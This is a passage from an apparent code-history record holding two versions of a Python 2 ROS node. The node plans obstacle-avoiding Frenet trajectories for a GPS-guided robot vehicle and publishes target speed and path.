KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx ** 2 + dy ** 2))\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n return fplist\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\ndef get_arc_length(tx, ty, st):\n arc_length = 0\n for x in range(1, st):\n arc_length = arc_length + np.hypot(tx[x - 1] - tx[x], ty[x - 1] - ty[x]\n )\n return arc_length\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python2\n# -*- coding: UTF-8 -*-\n# coding: utf-8\n#!/usr/bin/env python\n\n\n'''\n发布轨迹信息 \npath.x; path.y; c_speed;\n\n'''\n\n\n\n\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport math\nfrom cubic_spline import Spline2D\nfrom polynomials import QuarticPolynomial, QuinticPolynomial\nimport time\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import Point\nfrom nav_msgs.msg import Path\nfrom local_planner.msg import localPath\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nimport tf\nfrom CAN_driver.msg import Motor_Feedback\nfrom GNSS_driver.msg import GNSS_CAN\nimport sys\n\n\n\n# 参数\nMAX_SPEED = 30.0 # 最大速度 [m/s]\nMAX_ACCEL = 50.0 # 最大加速度 [m/ss]\nMAX_CURVATURE = 30.0 # 最大曲率 [1/m]\nMAX_ROAD_WIDTH = 10.0 # 最大道路宽度 [m]\nD_ROAD_W = 2.0 # 路宽采样间隔 [m]\nDT = 0.3 # Delta T[s]\nMAXT = 6.0 # 最大预测时间 [m]\nMINT = 4.0 # 最小预测时间 [m]\nTARGET_SPEED = 15.0/3.6 # 目标速度 [m/s] 即纵向速度保持\nD_T_S = 10.0/3.6 # 目标opo][]o][o][\\o][o][o速度采样间隔 [m/s]\nN_S_SAMPLE = 0.1 # 目标速度采样数量\nROBOT_RADIUS = 2.3 # 车辆半径 [m]\nTHRESH_DIST=0.01\n\n# 损失函数权重\nKJ = 0.8\nKT = 0.1\nKD = 20.0\nKLAT = 0.8\nKLON = 0.2\nshow_animation = True\n\n\nGob_x = []\nGob_y = []\n\n\n#规划失败标志 1 决策层需要\nPathFail_flag = 0 \n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n\n frenet_paths = []\n\n # generate path to each offset goal\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n # 采样,并对每一个目标配置生成轨迹\n # Lateral motion planning\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n # 计算出关于目标配置di,Ti的横向多项式\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n\n # 纵向速度规划 (速度保持)\n # Loongitudinal motion planning (Velocity keeping)\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n\n\n ###########################################################\n #高速时的损失函数\n ###########################################################\n Jp = sum(np.power(tfp.d_ddd, 2)) # square of jerk\n Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk\n # square of diff from target speed\n ds = (TARGET_SPEED - tfp.s_d[-1])**2\n # 横向的损失函数\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1]**2\n # 纵向的损失函数\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n # 总的损失函数为d 和 s方向的损失函数乘对应的系数相加\n\n #########################################################\n #低速时的损失函数\n #########################################################\n # # 低速时的损失函数\n # ltfp = copy.deepcopy(tfp)\n # ltfp.d_sss = [lat_qp.calc_third_derivative(s) for s in tfp.s]\n # Jp_s = sum(np.power(ltfp.d_sss, 2)) # square of jerk\n # Js = sum(np.power(tfp.s_ddd, 2)) # square of jerk\n # # S = s1 - s0\n # dS = tfp.s[-1] - s0\n # #横向的损失函数\n # tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2\n # #纵向的损失函数\n # tfp.cv = KJ * Js + KT * Ti + KD * ds\n \n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n # calc global positions\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n\n # calc yaw and ds\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx**2 + dy**2))\n\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n\n # calc curvature\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n\n return fplist\n\n\ndef check_collision(fp, ob):\n \n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0])**2 + (iy - ob[i, 1])**2)\n for (ix, iy) in zip(fp.x, fp.y)]\n collision = any([di <= ROBOT_RADIUS**2 for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([v > MAX_SPEED for v in fplist[i].s_d]): # Max speed check\n continue\n elif any([abs(a) > MAX_ACCEL for a in fplist[i].s_dd]): # Max accel check\n continue\n elif any([abs(c) > MAX_CURVATURE for c in fplist[i].c]): # Max curvature check\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n\n # find minimum cost path\n mincost = float(\"inf\")\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x,y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1) #0.1\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\n#######################################################################################\ndef load_global_path():\n global zero_cord_x,zero_cord_y\n bet = 0.1 \n blank = [] #buffer\n white = [] #buffer\n yellow = [] #buffer\n GPS_x = [] #所采集预描点的x\n GPS_y = [] #所采集预描点的x\n #读取预描点\n nums, ber = np.loadtxt(\"/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt\", dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank: #去除重复点\n #blank.append(nums[i])\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0] #起始点坐标\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2) \n if dis > bet: #选取大于设定的距离的点\n GPS_x.append(yellow[i]) #使cx,cy中点均满足要求\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i] \n GPS_x = np.array(GPS_x) #将列表转换成数组\n GPS_y = np.array(GPS_y)\n #print(\"cx:\",cx)\n #print(\"cy:\",cy)\n \n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x,GPS_y, \"-r\", label=\"GPS point \")\n plt.plot()\n plt.show() \n\n return GPS_x, GPS_y\n\nclass Info(object):\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n #self.CommandMessage = Car_Input()\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n\n # Subscribers\n\n rospy.Subscriber(\"coordinate\", Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10) #订阅GPS数据\n rospy.Subscriber(\"Motor_Feedback_mssage\", Motor_Feedback,self.RVcallback,queue_size = 10)\n \n\n \n \n def FeedbackCallbackGPSIMU(self, msg): \n self.CurrGPS_lat = msg.latitude \n self.CurrGPS_lon = msg.longitude \n self.ImuYaw = (90-msg.course_angle)*np.pi/180\n #print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n #print(\"msg.x\",\"msg.y\", msg.x, msg.y)\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby) \n #print(\"Gob_x\",\"Gob_y\", Gob_x, Gob_y)\n #np.append(self.gobx,5)\n #np.append(self.goby,5)\n \n self.gob = np.column_stack((Gob_x, Gob_y))\n #print(self.gobx,self.goby)\n #print(self.gob)\n\n def RVcallback(self,msg):\n \n self.CurrentVelocity = msg.Base_Vehspd\n #print(\"*\"*50)\n #print(\"rv:\",rv)\n #rospy.loginfo('I heard: %s', data.data)\n\n\n def init(self):\n return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity\n\n\n def talker(self,Target_Velocity, path_record):\n self.rate = rospy.Rate(100) # 10hz\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象\n # 定义发布器 path_pub 发布 trajectory\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50) #定义Publisher对象\n self.pub_Velocity.publish(Target_Velocity)\n # 发布路径\n self.path_pub.publish(path_record)\n #self.rate.sleep()\n\n\n\n# def talker(self,Target_Velocity,Target_Theta):\n# self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象\n# self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)\n# self.rate = rospy.Rate(100) # 10hz\n# self.pub_Velocity.publish(Target_Velocity)\n# self.pub_Steering.publish(Target_Theta)\n# self.rate.sleep()\n\n\n\n\n\n\n#######################################################################################\ndef get_transalation(curr_gps_lat,curr_gps_lon):\n curr_posy=(float(curr_gps_lon)-zero_cord_y)\n curr_posx=(float(curr_gps_lat)-zero_cord_x)\n #print(\"curr_posy,curr_posx=\",curr_posy,curr_posx)\n return curr_posx, curr_posy\n\n\n\ndef get_transformation(pt,curr_yaw,T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = (np.array(((c,-s), (s, c))))\n pt=pt.dot(R)+T\n return pt\n\n\n\ndef get_arc_length(tx,ty,st):\n arc_length=0\n for x in range(1,st):\n arc_length=arc_length+(np.hypot((tx[x-1]-tx[x]),(ty[x-1]-ty[x])))\n return arc_length\n\n\n\ndef get_lateral_dist(tx,ty,curr_posx,curr_posy):\n dist=[]\n for x in range(0,len(tx)-1):\n dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))\n lat_dist=min(dist)\n st=dist.index(min(dist))\n theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))\n theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))\n if lat_dist<THRESH_DIST:\n lat_dist=0\n curr_posx=tx[st]\n curr_posy=ty[st]\n if theta2<theta1:\n lat_dist=-lat_dist\n # print(lat_dist)\n return st, lat_dist, curr_posx, curr_posy\n\n\n\ndef proportional_control(target, current):\n #print(\"*\"*50)\n #print(\"current=\",current)\n #print(\"target - current\",target - current)\n a = 1.0 * (target - current)\n\n return a\n\n\n\n\n\n\ndef main():\n\n ptx = []\n pty = []\n\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n #print(csp)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)\n \n #当前车速及加速度\n c_speed = 5.0/3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0 # animation area length [m]\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)\n my_node = Info()\n \n \n while not rospy.is_shutdown():\n CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()\n #print(\"gob\",gob)\n ob = []\n \n if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):\n \n \n\n \n \n \n #print(CurrGPS_lat,CurrGPS_lon,ImuYaw, curr_posx, curr_posy)\n #print(gobx,goby,gob)\n #path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)\n #s0 = path.s[1]\n #c_d = path.d[1]\n #c_d_d = path.d_d[1]\n #c_d_dd = path.d_dd[1]\n #c_speed = path.s_d[1]\n \n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n \n \n \n \n curr_yaw = ImuYaw #+ math.pi / 2\n \n \n if (len(gob) == 0):\n ob = [[-20, -20]]\n \n else:\n ob = gob\n \n \n ob_len = len(ob)-1\n for x in xrange(0, ob_len):\n #print(\"ob_transformation\",ob)\n ob = np.array(ob)\n #ob[x, :] = .2 * ob[x, :]\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n #print(\"ob_transformation\",ob)\n #############################################################\n \n \n \n \n \n # c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)\n \n \n #spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)\n \n #curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n \n \n \n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)\n c_speed = path.s_d[1] \n #c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)\n c_d_d = path.d_d[1] \n c_d_dd = path.d_dd[1] \n \n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print(\"Goal\")\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, \"-.k\")\n plt.plot(road_left_x, road_left_y, \"-k\")\n plt.plot(road_right_x, road_right_y, \"-k\")\n plt.plot(ob[:, 0], ob[:, 1], \"ob\")\n plt.plot(path.x[1:], path.y[1:], \"-or\")\n plt.plot(path.x[1], path.y[1], \"vc\")\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc=\"r\", ec=\"k\", head_width=0.5, head_length=1.0)\n plt.title(\"v[km/h]:\" + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14) # 设置x轴,并设定字号大小\n plt.ylabel(u'y/m', fontsize=14) # 设置y轴,并设定字号大小\n plt.pause(0.0001)\n \n \n \n ####################规划成功############### \n ###########################################\n PathFail_flag = 0 \n ###########################################\n \n \n except:\n ###############规划失败################\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n \n ################对障碍物堆栈清空############\n ############################################\n ############################################\n global Gob_x\n global Gob_y\n Gob_x*=0\n Gob_y*=0 \n ############################################\n ############################################\n \n \n \n############################################################################### \n \n \n try:\n '''\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n '''\n path_record = localPath()\n\n # 配置路径\n for i in range(len(path.x[1:])):\n\n #print(\"path_x\",path.x[i])\n \n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i]) \n # 路径数量限制\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n # 发布路径`\n my_node.talker(c_speed, path_record)\n \n except: \n print(\"local path send fail\")\n pass\n #my_node.talker(c_speed, path.x[1:], path.y[1:])\n #except:\n # pass\n\n print(\"Finish\")\n end = time.time()\n #print(\"total time: \", end - start)\n\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
20,
21,
24,
25,
27
]
}
|
[
20,
21,
24,
25,
27
] |
#--------------------------------------------------------
